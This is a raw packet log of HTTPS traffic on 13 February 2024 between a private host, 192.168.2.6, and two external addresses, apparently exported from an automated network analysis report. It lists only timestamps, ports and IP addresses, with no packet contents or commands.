                                                                  Feb 13, 2024 21:13:50.776484966 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.776549101 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.776560068 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.776662111 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.776707888 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.776716948 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.799758911 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.799841881 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.799917936 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.799918890 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.799952984 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.800147057 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.800169945 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.800259113 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.800620079 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.800661087 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.800699949 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.800715923 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:53.599561930 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:53.599600077 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:53.599674940 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:53.614012003 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:53.614032030 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:53.865098000 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:53.865401983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:53.869155884 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:53.869164944 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:53.869498968 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:53.878299952 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:53.921910048 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141187906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141222954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141242027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141259909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141345024 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141365051 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141386986 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141405106 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141474009 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.141498089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.141531944 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.142076969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142097950 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142122030 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.142127991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142139912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142184973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.142905951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142927885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142949104 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142950058 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.142959118 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.142995119 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.143004894 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.143049002 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.143650055 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.143687963 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.143714905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.143728971 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.143738985 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.143791914 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.144573927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.144646883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.144681931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.144695997 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.144705057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.144754887 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.144762993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.145337105 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.145358086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.145380974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.145381927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.145391941 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.145417929 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.146219015 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.146240950 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.146259069 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.146265030 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.146272898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.146297932 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.146987915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147032976 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.147041082 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147085905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147109985 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147129059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.147134066 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147141933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147172928 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.147754908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147799015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.147842884 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.147895098 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.258475065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.258569002 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.259115934 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.259171009 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.259195089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.259253025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262306929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262362957 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262430906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262485981 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262506008 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262558937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262677908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262718916 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262737989 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262751102 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262762070 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262789965 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262856960 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262914896 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.262931108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.262985945 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.263322115 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.263379097 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.264029980 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.264103889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.264146090 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.264202118 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.265069008 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.265120983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.265727997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.265815020 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.265820980 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.265832901 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.265862942 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.265897036 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.307383060 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.307475090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.375642061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.375691891 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.375839949 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.375852108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.375983953 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.376393080 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.376452923 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.376756907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.376821995 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.376837015 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.376895905 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.377660036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.377715111 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.379966974 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.380022049 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.380048037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.380104065 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.380403996 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.380458117 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.380520105 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.380564928 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.381371021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.381421089 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.381999016 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.382054090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.382117987 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.382169008 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.382977962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.383029938 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.383775949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.383847952 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.383857012 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.383903027 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.384562016 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.384614944 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.385312080 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.385366917 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.385462046 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.385513067 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.386212111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.386277914 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.386948109 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.387017012 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.387034893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.387085915 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.388711929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.388783932 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.388787985 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.388820887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.388844967 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.391072989 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.391093969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.391135931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.391143084 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.391172886 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.392954111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.392977953 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.393011093 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.393030882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.393039942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.393064976 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.395373106 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.395399094 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.395452023 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.395457029 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.395478964 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.397030115 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.397043943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.397061110 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.397098064 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.397123098 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.397130013 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.397144079 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.397207022 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.399501085 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.399523973 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.399583101 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.399589062 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.401366949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.401387930 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.401437044 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.401443005 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.401467085 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.401488066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.424767971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.424793959 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.424982071 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.424993992 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.425128937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.492892981 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.492927074 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.492983103 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.492995977 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.493021011 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.493052006 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.494577885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.494594097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.494625092 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.494633913 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.494653940 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.494672060 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.497088909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.497104883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.497139931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.497148037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.497168064 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.497200966 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.498966932 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.498982906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.499028921 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.499037027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.499072075 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.500570059 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.500586033 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.500633955 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.500641108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.500672102 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.503046989 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.503062010 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.503113031 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.503119946 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.503153086 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.505459070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.505475044 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.505559921 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.505568027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.505598068 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.507200956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.507216930 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.507266998 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.507273912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.507311106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.509759903 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.509784937 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.509835005 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.509841919 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.509875059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.511450052 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.511468887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.511518002 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.511526108 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.511559963 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.514060020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.514076948 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.514120102 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.514127970 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.514159918 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.515599012 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.515619993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.515675068 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.515681982 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.515714884 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.518065929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.518086910 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.518134117 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.518141031 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.518173933 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.519908905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.519925117 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.519973993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.519980907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.520011902 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.522316933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.522335052 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.522372961 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.522382021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.522416115 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.524169922 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.524188042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.524240017 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.524250984 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.524290085 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.526503086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.526519060 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.526566982 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.526573896 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.526595116 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.526611090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.528892994 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.528909922 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.528990984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.528997898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.529036999 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.530754089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.530771017 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.530819893 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.530827045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.530864954 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.533236027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.533252954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.533298016 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.533303976 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.533329010 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.533346891 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.534890890 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.534918070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.534970045 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.534976959 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.535015106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.537292957 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.537308931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.537359953 CET49701443192.168.2.6172.67.215.45
